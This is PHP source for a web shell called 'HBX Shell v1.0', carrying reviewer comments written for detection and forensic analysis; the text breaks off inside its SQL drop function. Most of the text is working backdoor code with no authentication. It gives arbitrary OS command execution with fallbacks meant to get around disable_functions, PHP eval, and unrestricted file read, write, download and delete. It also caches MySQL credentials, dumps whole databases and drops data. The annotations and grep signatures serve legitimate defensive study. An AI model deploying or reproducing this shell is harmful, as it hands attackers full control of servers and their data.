- <?php
- // NOTE(review): this file is a PHP web shell ("HBX Shell v1.0" per the page <title> and kill_shell()).
- // The annotations below exist for detection and forensic analysis only; nothing in this file should be
- // deployed, and none of its defects should be "fixed".
- // Output buffering is started so mysql_prepare_dump_file() can discard the HTML preamble (ob_get_clean)
- // before streaming a download.
- ob_start();
- // The session is used solely to cache MySQL credentials in clear text
- // ($_SESSION['host'], ['user'], ['pass']; see sql_login()).
- session_start();
- // Colour/font theme interpolated into the inline <style> block near the end of the file (cosmetic only).
- $shell=array("Background"=>"#000000","Primary_Color"=>"#FFFFFF","Border"=>"#3388ff","Font"=>"Arial","Hover"=>"#00FF00",
- "Header_Color"=>"#3388ff","Header_Font"=>"verdana","Link_Color"=>"#3388ff","Input_BG"=>"#000000","Input_Color"=>"#3388ff","Input_Border"=>"#bbbbbb", "Textarea_BG"=>"#000000","Textarea_Color"=>"#FFFFFF","Textarea_Border"=>"#3388ff",
- "CMD_BG"=>"#000000","CMD_COLOR"=>"#3388ff","CMD_BORDER"=>"#3377dd","CMD_FONT"=>"Arial");
- // Request router. There is NO authentication anywhere in this file: any client that can reach the URL gets
- // every capability below. Detection: the shell is driven by XHR POSTs to the same URL whose body starts with
- // "s=<action>" (see sendRequest() in the JavaScript), plus the GET parameters "dl" and "sqldl".
- // ?sqldl=1&db=<name>[&tbl=<name>] streams a database/table dump as a download using the cached SQL credentials.
- if(isset($_GET['sqldl'])) {mysql_prepare_dump_file(); exit;}
- if(isset($_POST['s'])) {
- // Every argument below is taken from $_POST without validation or any path/host restriction.
- switch($_POST['s']) {
- case 'rename':
- rename_file($_POST['file'],$_POST['rname']);
- break;
- case 'chmod':
- if(is_dir($_POST['file'])) chmod_dir($_POST['file'],$_POST['mod'],true);
- else chmod_file($_POST['file'],$_POST['mod']);
- break;
- case 'mv':
- if(is_dir($_POST['file'])) move_dir($_POST['file'],$_POST['location'],true);
- else move_file($_POST['file'],$_POST['location']);
- break;
- case 'del':
- if(is_dir($_POST['file'])) delete_dir($_POST['file'],true);
- else delete_file($_POST['file']);
- break;
- case 'view':
- // view&d=<dir> lists a directory; view&f=<file> returns the file contents in an editable textarea.
- if(!isset($_POST['f'])) list_contents();
- else view_file($_POST['f']);
- break;
- case 'fsave':
- // Arbitrary file write: f=<path>&data=<contents>.
- write_contents();
- break;
- case 'sql':
- sql_login();
- break;
- case 'sqlview':
- sql_viewer();
- break;
- case 'insert':
- sql_insert();
- break;
- case 'query':
- // Raw SQL execution with the cached credentials: q=<statement>.
- execute_query(stripslashes($_POST['q']));
- break;
- case 'logout':
- sql_end_session();
- break;
- case 'create':
- sql_create();
- break;
- case 'drop':
- sql_drop();
- break;
- case 'edit':
- sql_edit();
- break;
- case 'eval':
- // Arbitrary PHP execution: e=<code>.
- post_eval();
- break;
- case 'cmd':
- console();
- break;
- case 'exec':
- // Arbitrary OS command execution: cmd=<command>; output is echoed raw into the XHR response.
- echo execute_cmd($_POST['cmd']);
- break;
- case 'kill':
- // Self-deletion (kill&dokill=1); see kill_shell() for what actually gets unlinked.
- kill_shell();
- break;
- default:
- // Any unknown action falls back to the directory listing.
- list_contents();
- break;
- }
- // Handlers write HTML fragments straight into the output buffer; the full page below is never rendered
- // for these XHR calls.
- exit;
- }
- // Arbitrary file download: ?dl=<absolute or relative path>. There is no path restriction; the only limits
- // are the web-server user's filesystem permissions and open_basedir.
- // Forensic note: stripslashes() is applied to every line read, so backslashes are removed and downloaded
- // copies of binary files are not byte-exact. $file is never initialised before the .= (relies on
- // undefined-variable notices being non-fatal).
- if(isset($_GET['dl']))
- {
- $fh=fopen($_GET['dl'],'r');
- while(!feof($fh)) $file.=stripslashes(fgets($fh));
- fclose($fh);
- header("Content-type: application/octet-stream");
- header("Content-length: ".strlen($file));
- // The Content-disposition filename is the unquoted basename of the requested path.
- header("Content-disposition: attachment; filename=".basename($_GET['dl']).";");
- echo $file;
- exit;
- }
- // Host reconnaissance displayed in the page header (only rendered on the initial non-XHR GET).
- // The hard-coded backslash separator suggests the shell was written/tested on Windows; on *nix the displayed
- // path is cosmetic only.
- $location=getcwd().'\\'.basename($_SERVER['PHP_SELF']);
- // Despite the name, "local" is the CLIENT (operator) address and its reverse lookup. It is written into the
- // rendered page, so a cached or proxied copy of the page may reveal the operator's IP.
- $local_addr=$_SERVER['REMOTE_ADDR'];
- $local_host=gethostbyaddr($local_addr);
- // "remote" is the server as named by the (client-controlled) Host header, forward-resolved.
- $remote_host=$_SERVER['HTTP_HOST'];
- $remote_addr=gethostbyname($remote_host);
- // Each hardening indicator is coloured green when it is ABSENT, i.e. from the attacker's point of view.
- $open_basedir=(ini_get("open_basedir")=="")?"<font color='#00FF00'><b>Off</b></font>":"<font color='#FF0000'>On</font>";
- // safe_mode was removed in PHP 5.4; on current PHP this always reads "Off".
- $safe_mode=(ini_get("safe_mode")=="")?"<font color='#00FF00'><b>Off</b></font>":"<font color='#FF0000'>On</font>";
- // The ext/mysql API (mysql_connect etc.) was removed in PHP 7; every SQL feature in this file depends on it.
- $mysql_on=(function_exists("mysql_connect")&&is_callable("mysql_connect"))?"<font color='#00FF00'><b>On</b></font>":"<font color='#FF0000'>Off</font>";
- $disabled_functions=(ini_get("disable_functions"))?ini_get("disable_functions"):"<font color='#00FF00'><b>None</b></font>";
- $software=$_SERVER['SERVER_SOFTWARE'];
- $php_ver=phpversion();
- $uname=php_uname();
- $curl_on=(function_exists("curl_init")&&is_callable("curl_init"))?"<font color='#00FF00'><b>Enabled</b></font>":"<font color='#FF0000'>Off</font>";
- $read_passwd=(file_exists("/etc/passwd")&&is_readable("/etc/passwd"))?"<font color='#00FF00'><b>Yes</b></font>":"<font color='#FF0000'>No</font>";
- // size() is declared later in the file; PHP hoists unconditional top-level function declarations, so this works.
- $disk_free=size(disk_free_space(getcwd()));
- $disk_space=size(disk_total_space(getcwd()));
- $includes=(@ini_get('allow_url_include')=='')?"<font color='#FF0000'>Disabled</font>":"<font color='#00FF00'><b>Enabled</b></font>";
- // Runs $cmd through the first shell-execution primitive that is not listed in disable_functions, trying
- // shell_exec, exec, passthru, system, popen and proc_open in that order. $cmd goes to the shell verbatim.
- // Hardening note: a disable_functions deny-list stops this shell only if ALL six names are listed
- // (and ideally others it does not try, e.g. pcntl_exec); a single omission is enough.
- function execute_cmd($cmd) {
- @$_dfunctions=ini_get("disable_functions");
- $_dfunctions=str_replace(' ','',$_dfunctions);
- $farr=explode(',',$_dfunctions);
- $_functions=array("shell_exec","exec","passthru","system","popen","proc_open");
- foreach($_functions as $_function)
- {
- // Only the first non-disabled candidate is ever attempted: the return at the bottom of this if-body
- // ends the loop regardless of whether that candidate produced any output.
- if(!in_array($_function,$farr))
- {
- if($_function=="exec")
- {
- // exec() puts the full output in $arr; $buf receives only the last line, and it is $buf (a string),
- // not $arr, that is handed to join().
- @$buf=exec($cmd,$arr);
- $ret=join("\n",$buf);
- }
- elseif($_function=="system")
- {
- // system() and passthru() write the command output directly into the output buffer; their return
- // values are the last line (system) and null (passthru), so $ret alone does not reflect what was sent.
- @$ret=system($cmd);
- }
- elseif($_function=="passthru")
- {
- @$ret=passthru($cmd);
- }
- elseif($_function=="shell_exec")
- {
- @$ret=shell_exec($cmd);
- }
- elseif($_function=="popen")
- {
- @$p=popen($cmd,'r');
- if(is_resource($p))
- {
- while(!feof($p)) $ret.=fgets($p);
- @pclose($p);
- }
- }
- elseif($_function=="proc_open")
- {
- // Only stdin and stdout are piped; stderr is not captured.
- $cmdpipe=array(
- 0=>array('pipe','r'),
- 1=>array('pipe','w')
- );
- @$proc=proc_open($cmd,$cmdpipe,$pipes);
- if(@is_resource($proc))
- {
- while(@!feof($pipes[1]))
- $ret.=@fgets($pipes[1]);
- @fclose($pipes[1]);
- // $resource is never assigned; the process handle in $proc is not closed here.
- @proc_close($resource);
- }
- }
- // $ret may be unset if the chosen primitive produced nothing.
- return $ret;
- }
- }
- }
- //Begin file functions
- //Primary
- // Directory browser. Lists the directory given by POST d= (default: the script's cwd) as an HTML table
- // with per-entry chmod/rename/move/delete/download links that feed back into the dispatcher.
- // Forensic notes: the misspelt "Permission denief" string is a usable grep signature for this family;
- // entry names are interpolated into HTML and inline JavaScript without any escaping; eregi() was removed
- // in PHP 7, so on PHP >= 7 listing any directory that contains a non-executable file aborts at that call.
- function list_contents() {
- $dirs_array=array(
- "Name"=>array(),
- "Link"=>array(),
- "Size"=>array(),
- "Group"=>array(),
- "Owner"=>array(),
- "Perms"=>array(),
- "Modified"=>array()
- );
- $files_array=$dirs_array;
- $dir=(isset($_POST['d']))?clean_dir($_POST['d']):clean_dir(getcwd());
- if(!@$dh=opendir($dir)) die("Permission denief in $dir!");
- while((@$file=readdir($dh))) {
- // '..' is deliberately kept so the operator can navigate upwards (handled via dir_lower below).
- if($file=='.') continue;
- $full_path=$dir.'/'.$file;
- if(is_dir($full_path)) {
- $dirs_array['Name'][]=$file;
- $dirs_array['Link'][]=$full_path;
- $dirs_array['Size'][]="DIR";
- $owner=(function_exists("posix_getpwuid")&&is_callable("posix_getpwuid"))?posix_getpwuid(fileowner($full_path)):fileowner($full_path);
- $grp=(function_exists("posix_getgrgid")&&is_callable("posix_getgrgid"))?posix_getgrgid(filegroup($full_path)):filegroup($full_path);
- // posix_getpwuid()/posix_getgrgid() return a lowercase 'name' key; the capitalised key used for
- // directories here (unlike the file branch below) yields an empty owner/group for directories.
- if(is_array($owner)) $owner=$owner['Name'];
- if(is_array($grp)) $grp=$grp['Name'];
- $dirs_array['Owner'][]=$owner;
- $dirs_array['Group'][]=$grp;
- $dirs_array['Perms'][]=get_perms(fileperms($full_path),'d');
- $dirs_array['Modified'][]=date("d/m/Y H:i:s",filemtime($full_path));
- }
- else {
- $files_array['Name'][]=$file;
- $files_array['Link'][]=$full_path;
- $files_array['Size'][]=size(filesize($full_path));
- $owner=(function_exists("posix_getpwuid")&&is_callable("posix_getpwuid"))?posix_getpwuid(fileowner($full_path)):fileowner($full_path);
- $grp=(function_exists("posix_getgrgid")&&is_callable("posix_getgrgid"))?posix_getgrgid(filegroup($full_path)):filegroup($full_path);
- if(is_array($owner)) $owner=$owner['name'];
- if(is_array($grp)) $grp=$grp['name'];
- $files_array['Owner'][]=$owner;
- $files_array['Group'][]=$grp;
- $files_array['Perms'][]=get_perms(fileperms($full_path),'f');
- $files_array['Modified'][]=date("d/m/Y H:i:s",filemtime($full_path));
- }
- }
- @closedir($dh);
- // asort() here reorders the column arrays by value, not the entries within them.
- asort($dirs_array);
- asort($files_array);
- echo "
- <div class='info'>
- <table><tr><td><font color='#FF00FF'>[ Executable ]</font></td><td><font color='#0000FF'>[ Writable ]</font></td>
- <td><font color='#FF0000'>[ Config ]</font></td><td><font color='#00FF00'>[ DIR ]</font></td></tr></table><center>Viewing directory: ";
- // Breadcrumb links: each path component becomes a 'view&d=' request for the prefix up to that component.
- $arr=explode('/',$dir);
- foreach($arr as $piece) {
- $path.="$piece/";
- echo "<a href='#' onClick=\"sendRequest('view&d=$path')\">$piece/</a>";
- }
- echo "</center></div><br />
- <table style='width: 100%'>
- <tr><td>File</td><td>Size</td><td>Owner/group</td><td>Perms</td><td>Modified</td><td>Actions</td></tr>";
- for($d=0;$d<count($dirs_array['Name']);$d++) {
- $nm=$dirs_array['Name'][$d];
- if($nm=="..") $link=dir_lower(clean_dir($dirs_array['Link'][$d]));
- else $link=$dirs_array['Link'][$d];
- echo "<tr><td><a href='#' onClick=\"sendRequest('view&d=$link')\"><font color='#00FF00'>[$nm]</font></a></td><td>".$dirs_array['Size'][$d]."</td><td>"
- .$dirs_array['Owner'][$d].'/'.$dirs_array['Group'][$d]."</td><td>".$dirs_array['Perms'][$d]."</td><td>"
- .$dirs_array['Modified'][$d]."</td><td><a href='#' onClick=\"loadInput('chmod','".$dirs_array['Link'][$d]."')\">[ Chmod ]</a> <a href='#' onClick=\"loadInput('move','".$dirs_array['Link'][$d]."')\">[ Move ]</a> <a href='#' onClick=\"sendRequest('del&file=".$dirs_array['Link'][$d]."')\">[ Delete ]</a></td><td><input type='checkbox'></td></tr>";
- }
- // Row colouring highlights targets of interest to the operator: executables, paths containing "config",
- // (intended) .sql/.db files, and writable files. strrchr() keeps the dot, so the "sql"/"db" comparisons never match.
- for($i=0;$i<count($files_array['Name']);$i++) {
- if(is_executable($files_array['Link'][$i])) $color='#FF00FF';
- else if(eregi("config",$files_array['Link'][$i])) $color='#FF0000';
- else if(strrchr($files_array['Name'][$i],'.')=="sql" || strrchr($files_array['Name'][$i],'.')=="db") $color='#00FF00';
- else if(is_writable($files_array['Link'][$i])) $color='#0000FF';
- else $color="#FFFFFF";
- $nm=$files_array['Name'][$i];
- echo "<tr style='color: $color;'><td>
- <a href='#' onClick=\"sendRequest('view&f=".$files_array['Link'][$i]."')\"><font color='$color'>$nm</a></font></td><td>"
- .$files_array['Size'][$i]."</td><td>".$files_array['Owner'][$i].'/'.$files_array['Group'][$i]."</td><td>".$files_array['Perms'][$i]."</td><td>"
- .$files_array['Modified'][$i]."</td><td><a href='#' onClick=\"loadInput('chmod','".$files_array['Link'][$i]."')\">[ Chmod ]</a> <a href='#' onClick=\"loadInput('rename','".$files_array['Link'][$i]."')\">[ Rename ]</a> <a href='#' onClick=\"loadInput('move','".$files_array['Link'][$i]."')\">[ Move ]</a> <a href='#' onClick=\"sendRequest('del&file=".$files_array['Link'][$i]."')\"> [ Delete ] </a><a href='?dl=".$files_array['Link'][$i]."' target='_blank'>[ Download ]</a></td><td><input type='checkbox'></td></tr>";
- }
- echo "</table>";
- }
- // Arbitrary file read for editing: returns the file in a <textarea> (HTML-escaped) plus a [ Save ] link that
- // posts 'fsave&f=<path>' with the textarea contents (see sendRequest option 'save'). $file is unrestricted.
- function view_file($file) {
- $fh=fopen($file,'r');
- if(is_resource($fh)) {
- while(!feof($fh)) $fcontents.=htmlspecialchars(fgets($fh));
- fclose($fh);
- // The path itself is interpolated into the onClick handler unescaped.
- echo "<center><a href='#' onClick=\"sendRequest('fsave&f=$file','save')\">[ Save ]</a></center>
- <textarea id='file' rows='20' style='width: 100%'>$fcontents</textarea>";
- } else {echo "Failed to open file $file for reading!<br /><br />"; list_contents();}
- }
- // Creates (or truncates) $file via a suppressed 'w' open; used by move_dir() before copying each file.
- function create_file($file) {
- @$fh=fopen($file,'w');
- @fclose($fh);
- }
- // Arbitrary file write: overwrites $_POST['f'] with stripslashes($_POST['data']). This is the primitive an
- // operator uses to plant or modify files (e.g. drop another backdoor); watch for POST bodies containing
- // "s=fsave&f=". The path and a success/failure message are echoed back unescaped.
- function write_contents() {
- if(is_resource($fh=fopen($_POST['f'],'w'))) {
- // Length is taken from the unstripped data, which is >= the stripped length, so the whole string is written.
- fwrite($fh,stripslashes($_POST['data']),strlen($_POST['data']));
- fclose($fh);
- echo "File $_POST[f] saved successfully!<br /><br />";
- } else {echo "Failed to write to file $_POST[f]!<br /><br />";}
- list_contents();
- }
- //Secondary
- // Renders fileperms() as an octal string for the listing: the mode is converted to octal and the type bits
- // are dropped (2 leading digits for a directory, 3 for a file), leaving the permission digits.
- function get_perms($mode,$type) { #Update for *nix perms later.
- if($type=='d') $mode=substr(base_convert($mode,10,8),2);
- else $mode=substr(base_convert($mode,10,8),3);
- return $mode;
- }
- // chmod() on a single path. $perms arrives as the decimal string typed into the UI (default "666"),
- // which chmod() interprets as the integer 666 (octal 1232) rather than 0666 -- so files touched through
- // this path may carry unusual mode bits, a possible forensic indicator.
- function chmod_file($file,$perms) {
- if(chmod($file,$perms)) echo "Managed to chmod file $file successfully.<br /><br />";
- else echo "Failed to chmod file $file.<br /><br />";
- list_contents();
- }
- // Renames $old to $new within the same directory (the directory part of $old is rebuilt and $new appended).
- // The status messages reference $file, which is never set, so they print with an empty name.
- function rename_file($old,$new) {
- $arr=explode('/',$old);
- array_pop($arr);
- foreach($arr as $piece) $rname.="$piece/";
- $rname.=$new;
- if(rename($old,$rname)) echo "Managed to rename file $file successfully.<br /><br />";
- else echo "Failed to rename file $file.<br /><br />";
- list_contents();
- }
- // "Move" is implemented as a read-then-write copy; the original at $old is NOT removed, so both copies
- // remain on disk afterwards (forensic note). $new is created/truncated before the read succeeds.
- function move_file($old,$new) {
- $fh=fopen($old,'r');
- $fh2=fopen($new,'w');
- if(is_resource($fh2)&&is_resource($fh)) {
- while(!feof($fh)) $out_contents.=fgets($fh);
- fwrite($fh2,$out_contents,strlen($out_contents));
- fclose($fh);
- fclose($fh2);
- echo "Moved file $old to $new successfully.<br /><br />";
- } else {echo "Failed to move file $old to $new<br /><br />";}
- list_contents();
- }
- // unlink() of an arbitrary path, followed by a re-listing.
- function delete_file($file) {
- if(unlink($file)) echo "Managed to delete file $file successfully.<br /><br />";
- else echo "Failed to delete file $file.<br /><br />";
- list_contents();
- }
- //Repetitive file functions
- // Recursive chmod of the FILES under $dir (directories themselves are recursed into but never chmod'ed).
- // $perms has the same decimal-string quirk as chmod_file(). $success/$files are passed by value and reset
- // at the top of every call, so the final summary only counts the top-level directory.
- function chmod_dir($dir,$perms,$call=false,$success=0,$files=0) {
- $files=$success=0;
- if(is_resource($dh=opendir($dir))) {
- while(($file=readdir($dh))) {
- if($file==".."||$file==".") continue;
- $files++;
- if(is_dir($dir.'/'.$file)) {
- chmod_dir($dir.'/'.$file,$perms,false,$success,$files);
- continue;
- }
- if(chmod($dir.'/'.$file,$perms)) {$success++; echo "CHMOD $file to $perms<br />";}
- }
- closedir($dh);
- if($call) echo "Changed perms for $success files out of $files files.<br /><br />";
- } else {echo "Failed to open dir $dir<br /><br />";}
- if($call) list_contents();
- }
- // Recursive "move" of a directory tree: in fact a copy, since nothing under $dir is removed. Only runs when
- // $loc does not already exist (it is mkdir'ed). Forensic note: $contents is never reset between files, so
- // each copied file is written with the accumulated contents of all previously copied files prepended.
- function move_dir($dir,$loc,$call=false) {
- if(is_resource($dh=opendir($dir))) {
- if(!is_dir($loc)) {
- if(!mkdir($loc)) die("Failed to create new location!");
- if(is_resource($dh2=opendir($loc))) {
- while(($file=readdir($dh))) {
- if($file=='.'||$file=='..') continue;
- if(is_dir($dir.'/'.$file)) {
- move_dir($dir.'/'.$file.'/',$loc.'/'.$file);
- continue;
- }
- create_file($loc.'/'.$file);
- $cur=fopen($dir.'/'.$file,'r');
- while(!feof($cur)) $contents.=fgets($cur);
- fclose($cur);
- $cur=fopen($loc.'/'.$file,'w');
- fwrite($cur,$contents,strlen($contents));
- fclose($cur);
- }
- } else {echo "Failed to [M] open dir $loc!";}
- } else {echo "Failed to open dir $dir!<br /><br />";}
- }
- if($call) list_contents();
- }
- // Recursively unlinks the files under $dir. rmdir() is never called, so the now-empty directory tree is
- // left behind (forensic note: empty directories with fresh mtimes). Counters are by-value, as in chmod_dir().
- function delete_dir($dir,$call=false,$success=0,$files=0) {
- if(is_resource($dh=opendir($dir))) {
- $files=$success=0;
- while(($file=readdir($dh))) {
- if($file==".."||$file==".") continue;
- $files++;
- if(is_dir($dir.'/'.$file)) {
- delete_dir($dir.'/'.$file,false,$success,$files);
- continue;
- }
- if(unlink($dir.'/'.$file)) {$success++; echo "Deleted $file...<br />";}
- }
- closedir($dh);
- if($call) echo "Deleted $success files out of $files files.<br /><br />";
- } else {echo "Failed to open dir $dir.<br /><br />";}
- if($call) list_contents();
- }
- //End
- // Normalises a path for display/navigation: backslashes become slashes and one level of "//" is collapsed.
- // This is NOT a security filter -- ".." components are left untouched.
- function clean_dir($d) {
- $d=str_replace("\\","/",$d);
- $d=str_replace("//","/",$d);
- return $d;
- }
- // Parent-directory helper for the ".." entry: drops the last two slash-separated components of the
- // "<dir>/.." link and rebuilds the prefix with a trailing slash.
- function dir_lower($d) {
- $dir=explode("/",$d);
- array_pop($dir);
- array_pop($dir);
- foreach($dir as $chunks) $lower.="$chunks/";
- return $lower;
- }
- // Human-readable byte count (rounded to whole GB/MB/KB/B). Falsy input (0, false) prints as "0 B".
- function size($s) {
- if(!$s) return "0 B";
- if($s>=1073741824) return(round($s/1073741824)." GB");
- elseif($s>=1048576) return(round($s/1048576)." MB");
- elseif($s>=1024) return(round($s/1024)." KB");
- else return($s.=" B");
- }
- //End file functions
- //Begin SQL functions
- // MySQL login: shows a form (defaults root@localhost:3306), then on 's=sql&host=&user=&pass=' tests the
- // credentials with mysql_connect() and caches them in CLEAR TEXT in $_SESSION for every later SQL action.
- // Forensic note: the PHP session file for this shell's session therefore contains database credentials.
- function sql_login() {
- if(isset($_SESSION['user'])) {mysql_view_dbs();}
- else if(!isset($_POST['host'])) {
- echo "<center>
- Host:Port: <input type='text' id='sql_host' value='localhost:3306'><br />
- Username: <input type='text' id='sql_user' value='root'><br />
- Password: <input type='password' id='sql_pass'><br /><br />
- <a href='#' onClick=\"sendRequest('sql','sqllogin')\">[ Login ]</a>
- </center>";
- } else {
- echo "<center>";
- if(@$conn=mysql_connect($_POST['host'],$_POST['user'],$_POST['pass'])) {
- echo "<font color='#00FF00'><b>Access granted</b></font></center>";
- $_SESSION['host']=$_POST['host'];
- $_SESSION['user']=$_POST['user'];
- $_SESSION['pass']=$_POST['pass'];
- mysql_view_dbs();
- } else {echo"<font color='#FF0000'><b>Access denied: Failed to connect to $_POST[user]@$_POST[host]</b></font></center>";}
- }
- }
- // Lists every database visible to the cached account with its table count and per-database
- // download (?sqldl=1&db=) and drop links. Database names are interpolated into SQL and HTML unescaped.
- // extract($_SESSION) turns the cached credentials into $host/$user/$pass locals.
- function mysql_view_dbs() {
- extract($_SESSION);
- echo "<center><br /><br />Currently logged in as $user@$host <a href='#' onClick=\"sendRequest('logout')\">[ Logout ]</a><br /><br /><table>";
- if(@$conn=mysql_connect($host,$user,$pass)) {
- echo "<tr><td>Database</td><td>Tables</td></tr>";
- $dbs=mysql_list_dbs();
- while($db=mysql_fetch_array($dbs))
- {
- $cur=mysql_query("SHOW TABLES FROM $db[Database]");
- $count=mysql_num_rows($cur);
- echo "<tr><td><a href='#' onClick=\"sendRequest('sqlview&db=$db[Database]')\">$db[Database]</a></td><td>$count</td><td><a href='?sqldl=1&db=$db[Database]' target='_blank'>[ Download ]</a> <a href='#' onClick=\"sendRequest('drop&db=$db[Database]')\">[ Drop ]</a></td></tr>";
- }
- // The failure message references $_POST[user]/[host], which are not set on this code path.
- } else {echo"<font color='#FF0000'><b>Access denied: Failed to connect to $_POST[user]@$_POST[host]</b></font></center>";}
- echo "</table><br /><a href='#' onClick=\"show('sql')\">[ Create Database ]</a><br /><br /><div id='sql' style='display: none'>Database: <input type='text' id='new_database' value='New_Database' onKeyDown=\"checkKey(event,'create')\"></div><br /><br />Execute query<br /><br /><input type='text' id='sql_out' style='display: none; width: 100%;'><input type='text' style='width: 100%' onKeyDown=\"checkKey(event,'sql_query')\" id='sql_in' value='SELECT * FROM information_schema.tables'></center>";
- }
- // Database/table browser. Without tbl= it lists the tables of $_POST['db'] with column counts and
- // download/drop links; with tbl= it dumps every row of the table into an HTML table with per-row edit/remove
- // links keyed on the first column. All identifiers and cell values are interpolated unescaped into SQL,
- // HTML and inline JavaScript.
- function sql_viewer() {
- extract($_SESSION);
- echo "<center><br />Currently logged in as $user@$host <a href='#' onClick=\"sendRequest('logout')\">[ Logout ]</a><br /><br /><table style='text-align: center;'>";
- if(@$conn=mysql_connect($host,$user,$pass)) {
- if(!isset($_POST['tbl'])) {
- echo "<tr><td>Table</td><td>Columns</td></tr>";
- $query=mysql_query("SHOW TABLES FROM $_POST[db]");
- while($tbl=mysql_fetch_array($query)) {
- $cols=mysql_query("SHOW COLUMNS FROM $_POST[db].$tbl[0]");
- $count=mysql_num_rows($cols);
- echo "<tr><td><a href='#' onClick=\"sendRequest('sqlview&db=$_POST[db]&tbl=$tbl[0]')\">$tbl[0]</a></td><td>$count</td><td><a href='?sqldl=1&db=$_POST[db]&tbl=$tbl[0]' target='_blank'>[ Download ]</a> <a href='#' onClick=\"sendRequest('drop&db=$_POST[db]&tbl=$tbl[0]')\">[ Drop ]</a></td></tr>";
- }
- echo "</table><br /><a href='#' onClick=\"show('sql')\">[ Insert table ]</a><br /><br /><div id='sql' style='display: none'>Database: <input type='text' id='new_database' style='width: 20%' value='new_table' onKeyDown=\"checkKey(event,'createtbl')\"><input type='hidden' id='sql_db' value='$_POST[db]'></div><br />Execute query<input type='text' id='sql_out' style='display: none; width: 100%;'><input type='text' style='width: 100%' onKeyDown=\"checkKey(event,'sql_query')\" id='sql_in' value='SELECT * FROM information_schema.tables'></center>";
- } elseif(isset($_POST['tbl'])) {
- $columns=array();
- $query=mysql_query("SHOW COLUMNS FROM $_POST[db].$_POST[tbl]");
- while($col=mysql_fetch_array($query)) $columns[]=$col['Field'];
- echo "<tr>";
- for($t=0;$t<count($columns);$t++) echo "<td>$columns[$t]</td>";
- echo "<td>Row actions</td></tr>";
- // Full, unpaginated SELECT * of the table -- a large table is rendered in one response.
- $query=mysql_query("SELECT * FROM $_POST[db].$_POST[tbl]");
- while($row=mysql_fetch_array($query)) {
- echo "<tr>";
- for($i=0;$i<count($columns);$i++)
- echo "<td>$row[$i]</td>";
- echo "<td><a href='#' onClick=\"sendRequest('edit&db=$_POST[db]&tbl=$_POST[tbl]&row=$columns[0]&v='+encodeURIComponent('$row[0]')+'')\">[ Edit Row ]</a> <a href='#' onClick=\"sendRequest('drop&db=$_POST[db]&tbl=$_POST[tbl]&row=$columns[0]&v=$row[0]')\">[ Remove row ]</a></td>";
- echo "</tr>";
- }
- echo "</table><br /><a href='#' onClick=\"sendRequest('insert&db=$_POST[db]&tbl=$_POST[tbl]')\">[ Insert row ]</a><br /><br />Execute query<input type='text' id='sql_out' style='display: none; width: 100%;'><input type='text' style='width: 100%' onKeyDown=\"checkKey(event,'sql_query')\" id='sql_in' value='SELECT * FROM information_schema.tables'></center>";
- }
- }
- }
- // Data exfiltration: builds a pseudo-SQL dump of one table (?sqldl=1&db=&tbl=) or of every table in a
- // database (?sqldl=1&db=) and streams it as an attachment. The first line of the dump,
- // "#######################SQL Data dumped by HBX Shell (version 1.0)#######################", is a reliable
- // indicator for locating exfiltrated dumps on disk, in proxy logs or in DLP captures.
- // The output is NOT valid SQL (values are backtick-quoted and statements have no terminating semicolon),
- // so it cannot be replayed with a stock client without post-processing.
- function mysql_prepare_dump_file()
- {
- echo "<h2>Preparing to dump SQL data...<br />";
- extract($_SESSION);
- if(@$conn=mysql_connect($host,$user,$pass)) {
- echo "Logged on to SQL server...good.<br />";
- $dump_file="#######################SQL Data dumped by HBX Shell (version 1.0)#######################\r\n";
- $dump_name=isset($_GET['tbl'])?$_GET['db'].'_'.$_GET['tbl'].'.sql':$_GET['db'].'.sql';
- if(isset($_GET['tbl'])) {
- echo "Dumping data from table $_GET[tbl]...<br />";
- mysql_select_db($_GET['db']);
- $columns=array();
- $query=mysql_query("SHOW COLUMNS FROM $_GET[tbl]");
- while($col=mysql_fetch_array($query)) $columns[]=$col['Field'];
- $query=mysql_query("SELECT * FROM $_GET[tbl]");
- while($row=mysql_fetch_array($query)) {
- $dump_file.="INSERT INTO `$_GET[tbl]` (";
- for($i=0;$i<count($columns);$i++) {
- if($i==count($columns)-1)
- $dump_file.="`$columns[$i]`)\r\n";
- else
- $dump_file.="`$columns[$i]`,";
- }
- $dump_file.="VALUES ( ";
- // mysql_fetch_array() returns both numeric and associative keys, so count($row) is twice the column
- // count and every value appears twice in the VALUES list.
- for($j=0;$j<count($row);$j++) {
- if($j==count($row)-1)
- $dump_file.="`$row[$j]`)\r\n";
- else
- $dump_file.="`$row[$j]`,";
- }
- }
- }
- else {
- echo "Dumping data from database $_GET[db]...<br />";
- $tables=array();
- $columns=array();
- $query=mysql_query("SHOW TABLES FROM $_GET[db]");
- while($tbl=mysql_fetch_array($query)) $tables[]=$tbl[0];
- foreach($tables as $current_table) {
- $current_cols=mysql_query("SHOW COLUMNS FROM $_GET[db].$current_table");
- while($col=mysql_fetch_array($current_cols)) $columns[]=$col['Field'];
- $query=mysql_query("SELECT * FROM $_GET[db].$current_table");
- while($row=mysql_fetch_array($query)) {
- $dump_file.="INSERT INTO `$current_table` (";
- for($i=0;$i<count($columns);$i++) {
- if($i==count($columns)-1)
- $dump_file.="`$columns[$i]`) \r\n";
- else
- $dump_file.="`$columns[$i]`,";
- }
- $dump_file.="VALUES ( ";
- for($j=0;$j<count($row);$j++) {
- if($j==count($row)-1)
- $dump_file.="`$row[$j]`)\r\n";
- else
- $dump_file.="`$row[$j]`,";
- }
- }
- $columns=array(); #Reset this badboy
- }
- }
- $dump_file.="END OF SQL DUMP\r\n";
- $dump_file.="########################################################################################";
- // Discard the "<h2>Preparing..." progress HTML buffered above so the download body is the dump alone.
- ob_get_clean();
- header("Content-type: application/octet-stream");
- header("Content-length: ".strlen($dump_file));
- header("Content-disposition: attachment; filename=$dump_name;");
- echo $dump_file;
- exit;
- }
- else echo "Failed to login! Cannot dump SQL.";
- echo "</h2>";
- }
- // Destructive SQL actions, dispatched on which POST parameters are present:
- //   db only           -> DROP DATABASE
- //   db+tbl            -> labelled "drop table" in the UI but actually DELETE FROM (the table structure survives)
- //   db+tbl+row+v      -> delete rows where <row>='<v>'
- // All identifiers and the value are interpolated into the statement unescaped; failures die() with mysql_error().
- function sql_drop() {
- extract($_SESSION);
- if(@$conn=mysql_connect($host,$user,$pass)) {
- if(!isset($_POST['tbl'])) {
- mysql_query("DROP DATABASE $_POST[db]") or die(mysql_error());
- echo "<center><font color='#00FF00'>Dropped database $_POST[db] successfully.</font><br /></center>";
- mysql_view_dbs();
- } elseif(isset($_POST['tbl'])&&!isset($_POST['row'])) {
- mysql_query("DELETE FROM $_POST[db].$_POST[tbl]") or die(mysql_error());
- echo "<center><font color='#00FF00'>Dropped table $_POST[tbl] successfully.</font><br /></center>";
- mysql_view_dbs();
- } else {
